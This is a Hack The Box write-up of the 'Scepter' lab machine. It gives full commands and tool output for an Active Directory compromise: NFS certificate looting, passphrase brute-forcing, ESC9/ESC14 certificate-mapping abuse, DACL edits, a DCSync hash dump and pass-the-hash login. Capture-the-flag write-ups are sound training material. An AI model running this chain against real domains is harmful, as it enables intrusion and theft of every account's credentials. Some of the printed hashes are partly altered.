Search ...
HTB Scepter
Write-up for the Hack the Box - Scepter - Hard machine.
Nmap scan
~ sudo nmap -sV -T4 -p- 10.10.11.65
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-20 15:23 CEST
Nmap scan report for 10.10.11.65
Host is up (0.015s latency).
Not shown: 65505 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-20 21:24:21Z)
111/tcp open rpcbind 2-4 (RPC #100000)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
2049/tcp open nlockmgr 1-4 (RPC #100021)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)Looking into the nmap results:
- port 88 kerberos, indicating AD.
- port 445, check for anonymous/guest acces.
- port 2049 with network lock manger running a NFS service.
- port 5985/5986 winrm
Setup hosts and krb5
Using
ldapsearch -x -H ldap://10.10.11.65 -s base we can find the fdqn of the dc# setup /etc/hosts
echo "10.10.11.65 dc01.scepter.htb scepter.htb" | sudo tee -a /etc/hosts
# krb5.conf
[libdefaults]
default_realm = SCEPTER.HTB
dns_lookup_realm = false
dns_lookup_kdc = false
ticket_lifetime = 24h
renew_lifetime = 7d
forwardable = true
[realms]
SCEPTER.HTB = {
kdc = dc01.scepter.htb:88
admin_server = dc01.scepter.htb:749
default_domain = scepter.htb
}
[domain_realm]
.scepter.htb = SCEPTER.HTB
scepter.htb = SCEPTER.HTBNO access to any smb shares so check whats share is availabe on NFS.
➜ ~ showmount -e 10.10.11.65
Export list for 10.10.11.65:
/helpdesk (everyone)Then mount the share
sudo mount -t nfs 10.10.11.65:/helpdesk ./nfs/ -o nolockThe shares are owned by nobody and nogroup, so no access.
➜ ~ ls -la | grep nfs
drwx------ 2 nobody nogroup 64 Nov 2 2024 nfsChange to root and open the share, we find several
.crt, .key and .pfx files.┌──(root㉿kali)-[/home/kali/nfs]
└─# ls
baker.crt baker.key clark.pfx lewis.pfx scott.pfxA .pfx file is a container to store private, public keys and certificates. Cracking clark.pfx, lewis.pfx and scott.pfx was not possible. A .pfx file can be used with Certipy to authenticate and get a NTLM hash or TGT.
Creating a .pxf file
Having baker.crt and baker.key its possible to create a .pfx file, however the its asking for pass phrase for the key.
openssl pkcs12 -export -out baker.pfx -inkey baker.key -in baker.crt
Enter pass phrase for baker.key:
Could not find private key from -inkey file from baker.key
40C7CA465D7F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:107:
40C7CA465D7F0000:error:11800074:PKCS12 routines:PKCS12_pbe_crypt_ex:pkcs12 cipherfinal error:../crypto/pkcs12/p12_decr.c:92:empty passwordWe can brute force the pass phrase using openssl.
while read p; do
echo "Trying $p"
openssl rsa -in baker.key -passin pass:$p -noout 2>/dev/null && echo "[+] Found password: $p" && break
done < /home/kali/rockyou.txtNow try again to make the .pfx file, leave export password empty.
openssl pkcs12 -export -out /home/kali/baker.pfx -inkey baker.key -in baker.crt
Enter pass phrase for baker.key:
Enter Export Password:
Verifying - Enter Export Password:Using Certipy to authenticate, we get a clock skew, for that we can use faketime.
➜ ~ faketime -f $(ntpdate -q 10.10.11.65 | awk '{print $4}') bash
# Authenticate with certipy
└─$ certipy-ad auth -pfx /home/kali/baker.pfx -username d.baker -domain scepter.htb -dc-ip 10.10.11.65
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'd.baker@scepter.htb'
[*] Security Extension SID: 'S-1-5-21-74879546-916818434-740295365-1106'
[*] Using principal: 'd.baker@scepter.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'd.baker.ccache'
[*] Wrote credential cache to 'd.baker.ccache'
[*] Trying to retrieve NT hash for 'd.baker'
[*] Got hash for 'd.baker@scepter.htb': aad3b435b51sdfsd3b435b51404ee:18b5fb0d9sdfsfdsf22ceDomain Recon
# Getting users
└─$ nxc smb 10.10.11.65 -u d.baker -H 18b5fb0d99e7a475316213c15b6f22ce --users
SMB 10.10.11.65 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:scepter.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.65 445 DC01 [+] scepter.htb\d.baker:18b5fb0d99e7a475316213c15b6f22ce
SMB 10.10.11.65 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.65 445 DC01 Administrator 2025-03-07 22:19:11 0 Built-in account for administering the computer/domain
SMB 10.10.11.65 445 DC01 Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.11.65 445 DC01 krbtgt 2024-10-31 22:24:41 0 Key Distribution Center Service Account
SMB 10.10.11.65 445 DC01 d.baker 2025-07-21 00:51:03 0
SMB 10.10.11.65 445 DC01 a.carter 2025-07-21 00:51:03 0
SMB 10.10.11.65 445 DC01 h.brown 2025-03-07 22:19:11 0
SMB 10.10.11.65 445 DC01 p.adams 2024-11-02 08:00:25 0
SMB 10.10.11.65 445 DC01 e.lewis 2024-11-02 01:07:14 0
SMB 10.10.11.65 445 DC01 o.scott 2024-11-02 01:07:14 0
SMB 10.10.11.65 445 DC01 M.clark 2024-11-02 01:07:14 0
SMB 10.10.11.65 445 DC01 [*] Enumerated 10 local users: SCEPTER
Bloodhound to check rights of d.baker
➜ ~ bloodhound-ce-python -u d.baker --hashes :18b5fb0d99e7a475316213c15b6f22ce -d scepter.htb -dc dc01.scepter.htb -c All -ns 10.10.11.65
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: scepter.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 11 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.scepter.htb
INFO: Done in 00M 02SD.baker can change the password of A.Carter.
A.Carter is member of IT Support which has GenericAll or Full Control over the OU meaning anything we apply to the OU objects inside the OU will inherit those changes. Using dacledit.py we can use the
-inherit flag to do so.
We also find D.Baker can enroll on StaffAccessCertificate template as D.Baker is in staff group.
# Enrollment rights.
└─$ certipy-ad find -u d.baker@scepter.htb -k -no-pass -dc-ip 10.10.11.65 -target dc01.scepter.htb -dns-tcp -stdout -vulnerable
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Finding issuance policies
[*] Found 20 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'scepter-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'scepter-DC01-CA'
[*] Checking web enrollment for CA 'scepter-DC01-CA' @ 'dc01.scepter.htb'
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : scepter-DC01-CA
DNS Name : dc01.scepter.htb
Certificate Subject : CN=scepter-DC01-CA, DC=scepter, DC=htb
Certificate Serial Number : 716BFFE1BE1CD1A24010F3AD0E350340
Certificate Validity Start : 2024-10-31 22:24:19+00:00
Certificate Validity End : 2061-10-31 22:34:19+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : SCEPTER.HTB\Administrators
Access Rights
ManageCa : SCEPTER.HTB\Administrators
SCEPTER.HTB\Domain Admins
SCEPTER.HTB\Enterprise Admins
ManageCertificates : SCEPTER.HTB\Administrators
SCEPTER.HTB\Domain Admins
SCEPTER.HTB\Enterprise Admins
Enroll : SCEPTER.HTB\Authenticated Users
Certificate Templates
# interesting template
Template Name : StaffAccessCertificate
Permissions
Enrollment Permissions
Enrollment Rights : SCEPTER.HTB\staff
Object Control Permissions
Owner : SCEPTER.HTB\Enterprise Admins
Full Control Principals : SCEPTER.HTB\Domain Admins
SCEPTER.HTB\Local System
SCEPTER.HTB\Enterprise Admins
Write Owner Principals : SCEPTER.HTB\Domain Admins
SCEPTER.HTB\Local System
SCEPTER.HTB\Enterprise Admins
Write Dacl Principals : SCEPTER.HTB\Domain Admins
SCEPTER.HTB\Local System
SCEPTER.HTB\Enterprise Admins
Checking for vulnerable templates it shows vulnerable for ESC9.
# Find vulnerable templates
certipy-ad find -u d.baker@scepter.htb -k -no-pass -dc-ip 10.10.11.65 -target dc01.scepter.htb -dns-tcp -stdout -vulnerable
Enrollment Rights : SCEPTER.HTB\staff
Object Control Permissions
Owner : SCEPTER.HTB\Enterprise Admins
Full Control Principals : SCEPTER.HTB\Domain Admins
SCEPTER.HTB\Local System
SCEPTER.HTB\Enterprise Admins
Write Owner Principals : SCEPTER.HTB\Domain Admins
SCEPTER.HTB\Local System
SCEPTER.HTB\Enterprise Admins
Write Dacl Principals : SCEPTER.HTB\Domain Admins
SCEPTER.HTB\Local System
SCEPTER.HTB\Enterprise Admins
[+] User Enrollable Principals : SCEPTER.HTB\staff
[!] Vulnerabilities
ESC9 : Template has no security extension.
[*] Remarks
ESC9 : Other prerequisites may be required for this to be exploitable. See the wiki for more details
ESC9 exploits weakness in how AD maps certificates to users. From the output we see "Template has no security extension", and this will skip security checks. Normally only the right person can use the certificate but now it only looks at the UPN to decide who the certificate belongs to. ESC9 requires UPN and not email.
Requesting a certificate a D.Baker
When requesting a certificate for D.Baker we get an error saying
CERTSRV_E_SUBJECT_EMAIL_REQUIRED. The CA is asking for subject email to have a value.┌──(kali㉿kali)-[~]
└─$ certipy-ad req -u d.baker@scepter.htb -k -no-pass -dc-ip 10.10.11.65 -dc-host dc01.scepter.htb -target dc01.scepter.htb -ca scepter-DC01-CA -template StaffAccessCertificate -upn D.Baker
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 2
[-] Got error while requesting certificate: code: 0x80094812 - CERTSRV_E_SUBJECT_EMAIL_REQUIRED - The email name is unavailable and cannot be added to the Subject or Subject Alternate name.
Would you like to save the private key? (y/N): n
[-] Failed to request certificate
So we need to add an email address to D.Bakers email attribute, confirming we cannot use ESC9 here.
ESC14
Looking into all users we find an interesting H.Brown attribute:
altSecurityIdentities X509:<RFC822>h.brown@scepter.htb. Finding more info I find, https://www.thehacker.recipes/ad/movement/adcs/certificate-templates#esc14-a-write-access-on-altsecurityidentities. As we have Full Control over the mail attribute of D.Baker with no security checks we can place the H.Brown email address there which will return a certificate for H.Brown.
$ python3 GetWeakExplicitMappings.py --dc-host dc01.scepter.htb -u a.carter -p Pass@123 -d scepter.htb
[+] Connecion OK
[+] CN=h.brown,CN=Users,DC=scepter,DC=htb
- X509:<RFC822>h.brown@scepter.htbThe Attack
Changing password A.Carter
Using bloodyAD we change A.Carter password.
Using bloodyAD we change A.Carter password.
# Get TGT
getTGT.py scepter.htb/d.baker -hashes :18b5fb0d99e7a475316213c15b6f22ce
# Change password
KRB5CCNAME=d.baker.ccache bloodyAD --host "dc01.scepter.htb" --dc-ip "10.10.11.65" -d "scepter.htb" -k set password "a.carter" "Pass@123"
[+] Password changed successfully!We then give FullControl to A.Carter over "Staff Access Certificate" using the
-inheritance flags so the rights will apply to any child object in the OU. $ dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'A.Carter' -target-dn 'OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB' 'scepter.htb/A.Carter:Pass@123'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20250721-032716.bak
[*] DACL modified successfully!Finally we can set mail attribute of D.Baker to h.browns@scepter.htb
$ bloodyAD -u a.carter -p 'Pass@123' -d scepter.htb --host dc01.scepter.htb set object D.Baker mail -v 'h.brown@scepter.htb'
[+] D.Baker's mail has been updatedNow can we request a certificate and use that certificate to get the NT hash or TGT.
# Request certificate
$ certipy-ad req -u d.baker@scepter.htb -hashes 18b5fb0d99e7a475316ss3c15b6f22ce -target "dc01.scepter.htb" -ca "scepter-DC01-CA" -template "StaffAccessCertificate"
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: dc01.scepter.htb.
[!] Use -debug to print a stacktrace
[!] DNS resolution failed: The DNS query name does not exist: SCEPTER.HTB.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 3
[*] Successfully requested certificate
[*] Got certificate without identity
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'd.baker.pfx'
[*] Wrote certificate and private key to 'd.baker.pfx'
# Authenticate
─$ certipy-ad auth -pfx d.baker.pfx -username h.brown -domain scepter.htb -dc-ip 10.10.11.65
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] No identities found in this certificate
[!] Could not find identity in the provided certificate
[*] Using principal: 'h.brown@scepter.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'h.brown.ccache'
[*] Wrote credential cache to 'h.brown.ccache'
[*] Trying to retrieve NT hash for 'h.brown'
[*] Got hash for 'h.brown@scepter.htb': aad3b435b51404eeaad3b435b51404ee:4ecf5242092sfw8c160a08069c75a0cWinrm for user flag
─$ evil-winrm -i dc01.scepter.htb -r scepter.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\h.brown\Documents> ls ../Desktop
Directory: C:\Users\h.brown\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/20/2025 2:17 PM 34 user.txtRoot
Finding a user that can DCSync the domain is the next target to focus on.
Looking for more vulnerable templates we find HelpDeskEnrollmentCertificate on which only Domain and Enterprise Admin can enroll which P.Adams is. So If we can request a certificate as P.Adams we have gained acces to the domain as Domain Admins.
Certificate Templates
0
Template Name : HelpdeskEnrollmentCertificate
Display Name : HelpdeskEnrollmentCertificate
Certificate Authorities : scepter-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectAltRequireDns
SubjectRequireDnsAsCn
Enrollment Flag : AutoEnrollment
Extended Key Usage : Server Authentication
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 99 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2024-11-01T03:42:58+00:00
Template Last Modified : 2024-11-01T03:43:09+00:00
Permissions
Enrollment Permissions
Enrollment Rights : SCEPTER.HTB\Domain Admins
SCEPTER.HTB\Domain Computers
SCEPTER.HTB\Enterprise Admins
Object Control Permissions
Owner : SCEPTER.HTB\Administrator
Full Control Principals : SCEPTER.HTB\Domain Admins
SCEPTER.HTB\Enterprise Admins
Write Owner Principals : SCEPTER.HTB\Domain Admins
SCEPTER.HTB\Enterprise Admins
Write Dacl Principals : SCEPTER.HTB\Domain Admins
SCEPTER.HTB\Enterprise Admins
Write Property Enroll : SCEPTER.HTB\Domain Admins
SCEPTER.HTB\Domain Computers
SCEPTER.HTB\Enterprise Admins
[+] User Enrollable Principals : SCEPTER.HTB\Domain Computers
Enumeration using dacledit in a simple loop.
Using dacledit.py in a loop we can enumerate all users against all users and groups to see if if finds anything interesting.
#!/bin/bash
DC_IP="10.10.11.65"
DOMAIN="scepter.htb"
AUTH="scepter.htb/h.brown"
PRINCIPAL_FILE="principal.txt"
TARGET_FILE="target.txt"
total_tests=0
matches=0
# Count total lines for estimated progress
num_principals=$(wc -l < "$PRINCIPAL_FILE")
num_targets=$(wc -l < "$TARGET_FILE")
total_combinations=$((num_principals * num_targets))
current=1
while IFS= read -r principal || [[ -n "$principal" ]]; do
while IFS= read -r target || [[ -n "$target" ]]; do
printf "[%4d/%4d] Testing: %s --> %s\r" "$current" "$total_combinations" "$principal" "$target"
((current++))
((total_tests++))
output=$(python3 dacledit.py -k -action read \
-principal "$principal" \
-target "$target" \
-dc-ip "$DC_IP" \
"$AUTH" -no-pass 2>/dev/null)
if echo "$output" | grep -q "ACE\["; then
((matches++))
echo -e "\n\n[+] Match Found: $principal --> $target"
echo "$output"
echo
fi
done < "$TARGET_FILE"
done < "$PRINCIPAL_FILE"After running for a while we get a result back.
./brute_scepter.sh
[ 10/ 494] Testing: CMS --> p.adamsrrator
[+] Match Found: CMS --> p.adams
Impacket v0.13.0.dev0+20250721.105211.75610382 - Copyright Fortra, LLC and its affiliated companies
[*] Parsing DACL
[*] Printing parsed DACL
[*] Filtering results for SID (S-1-5-21-74879546-916818434-740295365-1601)
[*] ACE[24] info
[*] ACE Type : ACCESS_ALLOWED_OBJECT_ACE
[*] ACE flags : CONTAINER_INHERIT_ACE, INHERITED_ACE
[*] Access mask : WriteProperty (0x20)
[*] Flags : ACE_OBJECT_TYPE_PRESENT, ACE_INHERITED_OBJECT_TYPE_PRESENT
[*] Object type (GUID) : Alt-Security-Identities (00fbf30c-91fe-11d1-aebc-0000f80367c1)
[*] Inherited type (GUID) : User (bf967aba-0de6-11d0-a285-00aa003049e2)
[*] Trustee (SID) : CMS (S-1-5-21-74879546-916818434-740295365-1601)
[*] ACE[25] info
[*] ACE Type : ACCESS_ALLOWED_OBJECT_ACE
[*] ACE flags : CONTAINER_INHERIT_ACE, INHERITED_ACE
[*] Access mask : ReadProperty (0x10)
[*] Flags : ACE_INHERITED_OBJECT_TYPE_PRESENT
[*] Inherited type (GUID) : User (bf967aba-0de6-11d0-a285-00aa003049e2)
[*] Trustee (SID) : CMS (S-1-5-21-74879546-916818434-740295365-1601)The output shows
ACCESS_ALLOWED_OBJECT_ACE with WriteProperty on the Alt-Security-Identities on the Trustee CMS. Meaning we are allowed to write to the Alt-Security-Identities attributes. Looking in Bloodhound, H.Brown is MemberOf CMS group, so we can use H.Brown account to use WriteProperty. 
ESC14
When a user logs in and presents something other than a password (e.g., smart cards, external PKI or a certificate) Windows will check whats in
altSecurityIdentities. By adding a reference to a certificate in someone's altSecurityIdentities attribute its possible to login as that user or computer. In this case we are mapping
X509RFC822 as X509:<RFC822>p.adams@scepter.htb using H.Brown account.# Set alSecurityIdentity attribute
bloodyAD --host DC01.scepter.htb -d scepter.htb -k set object p.adams altSecurityIdentities -v 'X509:<RFC822>zen@scepter.htb'
[+] p.adams's altSecurityIdentities has been updated
# Check
bloodyAD --host DC01.scepter.htb -d scepter.htb -k get object p.adams --attr altSecurityIdentities
distinguishedName: CN=p.adams,OU=Helpdesk Enrollment Certificate,DC=scepter,DC=htb
altSecurityIdentities: X509:<RFC822>p.adams@scepter.htbNow we need to repeat the steps earlier only now to change the mail of D.Baker to p.adams@scepter.htb.
# Change password again for A.Carter
KRB5CCNAME=d.baker.ccache bloodyAD --host "dc01.scepter.htb" --dc-ip "10.10.11.65" -d "scepter.htb" -k set password "a.carter" "Pass@123"
# Get FullControl
dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'a.carter' -target-dn 'OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB' 'scepter.htb'/'a.carter':'Pass@123'
Impacket v0.13.0.dev0+20250721.105211.75610382 - Copyright Fortra, LLC and its affiliated companies
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20250722-024758.bak
[*] DACL modified successfully!
# Change mail d.baker
bloodyAD -d "scepter.htb" -u "a.carter" -p 'Pass@123' --host "dc01.scepter.htb" set object "d.baker" mail -v "p.adams@scepter.htb"
[+] d.baker's mail has been updated
# Request certificate
KRB5CCNAME=d.baker.ccache certipy req -k -u "p.adams" -target "dc01.scepter.htb" -ca "scepter-DC01-CA" -template "StaffAccessCertificate" -out p.adams.pfx
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
[!] DNS resolution failed: The DNS query name does not exist: dc01.scepter.htb.
[!] Use -debug to print a stacktrace
[!] DNS resolution failed: The DNS query name does not exist: SCEPTER.HTB.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 5
[*] Successfully requested certificate
[*] Got certificate without identity
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'p.adams.pfx'
[*] Wrote certificate and private key to 'p.adams.pfx'If you get mismatch check if the email changed in p.adams's altSecurityIdentities is the same as the email in the certificate.
─$ certipy auth -pfx p.adams.pfx -username p.adams -domain scepter.htb -dc-ip 10.10.11.65
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] No identities found in this certificate
[!] Could not find identity in the provided certificate
[*] Using principal: 'p.adams@scepter.htb'
[*] Trying to get TGT...
[-] Name mismatch between certificate and user 'p.adams'
[-] See the wiki for more informationAfter using the right emailadress I got the TGT and NT hash for p.adams.
$ certipy auth -pfx p.adams.pfx -username p.adams -domain scepter.htb -dc-ip 10.10.11.65
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] No identities found in this certificate
[!] Could not find identity in the provided certificate
[*] Using principal: 'p.adams@scepter.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'p.adams.ccache'
[*] Wrote credential cache to 'p.adams.ccache'
[*] Trying to retrieve NT hash for 'p.adams'
[*] Got hash for 'p.adams@scepter.htb': aad3b435b51404eeaad3b435b51404ee:1b925c524sdfs221a8789c4b118ce0We could then DCSync, get the administrator hash and get root flag.
┌──(kali㉿kali)-[~]
└─$ KRB5CCNAME=p.adams.ccache secretsdump.py -k -no-pass dc01.scepter.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a291ead3sdfs773dc615sfde66c2ea21c4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c030fca580038cc8b1100ee37064a4a9:::
scepter.htb\d.baker:1106:aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce:::
scepter.htb\a.carter:1107:aad3b435b51404eeaad3b435b51404ee:2e24650b1e4f376fa574da438078d200:::
scepter.htb\h.brown:1108:aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c:::
scepter.htb\p.adams:1109:aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0:::
scepter.htb\e.lewis:2101:aad3b435b51404eeaad3b435b51404ee:628bf1914e9efe3ef3a7a6e7136f60f3:::
scepter.htb\o.scott:2102:aad3b435b51404eeaad3b435b51404ee:3a4a844d2175c90f7a48e77fa92fce04:::
scepter.htb\M.clark:2103:aad3b435b51404eeaad3b435b51404ee:8db1c7370a5e33541985b508ffa24ce5:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:0a4643c21fd6a17229b18ba639ccfd5f:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:cc5d676d45f8287aef2f1abcd65213dsdf6c54c9b1977935983e28348bcd5
Administrator:aes128-cts-hmac-sha1-96:bb557b22bad08c219ce7425f2fe0b70c
Administrator:des-cbc-md5:f79d45bf688aa238
krbtgt:aes256-cts-hmac-sha1-96:5d62c1b68af2bb009bb4875327edd5e4065ef2bf08e38c4ea0e609406d6279ee
krbtgt:aes128-cts-hmac-sha1-96:b9bc4dc299fe99a4e086bbf2110ad676
krbtgt:des-cbc-md5:57f8ef4f4c7f6245
scepter.htb\d.baker:aes256-cts-hmac-sha1-96:6adbc9de0cb3fb631434e513b1b282970fdc3ca089181991fb7036a05c6212fb
scepter.htb\d.baker:aes128-cts-hmac-sha1-96:eb3e28d1b99120b4f642419c99a7ac19
scepter.htb\d.baker:des-cbc-md5:2fce8a3426c8c2c1
scepter.htb\a.carter:aes256-cts-hmac-sha1-96:5a793dad7f782356cb6a741fe73ddd650ca054870f0c6d70fadcae162a389a71
scepter.htb\a.carter:aes128-cts-hmac-sha1-96:f7643849c000f5a7a6bd5c88c4724afd
scepter.htb\a.carter:des-cbc-md5:d607b098cb5e679b
scepter.htb\h.brown:aes256-cts-hmac-sha1-96:5779e2a207a7c94d20be1a105bed84e3b691a5f2890a7775d8f036741dadbc02
scepter.htb\h.brown:aes128-cts-hmac-sha1-96:1345228e68dce06f6109d4d64409007d
scepter.htb\h.brown:des-cbc-md5:6e6dd30151cb58c7
scepter.htb\p.adams:aes256-cts-hmac-sha1-96:0fa360ee62cb0e7ba851fce9fd982382c049ba3b6224cceb2abd2628c310c22f
scepter.htb\p.adams:aes128-cts-hmac-sha1-96:85462bdef70af52770b2260963e7b39f
scepter.htb\p.adams:des-cbc-md5:f7a26e794949fd61
scepter.htb\e.lewis:aes256-cts-hmac-sha1-96:1cfd55c20eadbaf4b8183c302a55c459a2235b88540ccd75419d430e049a4a2b
scepter.htb\e.lewis:aes128-cts-hmac-sha1-96:a8641db596e1d26b6a6943fc7a9e4bea
scepter.htb\e.lewis:des-cbc-md5:57e9291aad91fe7f
scepter.htb\o.scott:aes256-cts-hmac-sha1-96:4fe8037a8176334ebce849d546e826a1248c01e9da42bcbd13031b28ddf26f25
scepter.htb\o.scott:aes128-cts-hmac-sha1-96:37f1bd1cb49c4923da5fc82b347a25eb
scepter.htb\o.scott:des-cbc-md5:e329e37fda6e0df7
scepter.htb\M.clark:aes256-cts-hmac-sha1-96:a0890aa7efc9a1a14f67158292a18ff4ca139d674065e0e4417c90e5a878ebe0
scepter.htb\M.clark:aes128-cts-hmac-sha1-96:84993bbad33c139287239015be840598
scepter.htb\M.clark:des-cbc-md5:4c7f5dfbdcadba94
DC01$:aes256-cts-hmac-sha1-96:4da645efa2717daf52672afe81afb3dc8952aad72fc96de3a9feff0d6cce71e1
DC01$:aes128-cts-hmac-sha1-96:a9f8923d526f6437f5ed343efab8f77a
DC01$:des-cbc-md5:d6923e61a83d51ef
[*] Cleaning up...
And get the flag
evil-winrm -i dc01.scepter.htb -u administrator -H a291easdfs3f9773dc615e66c2ea21c4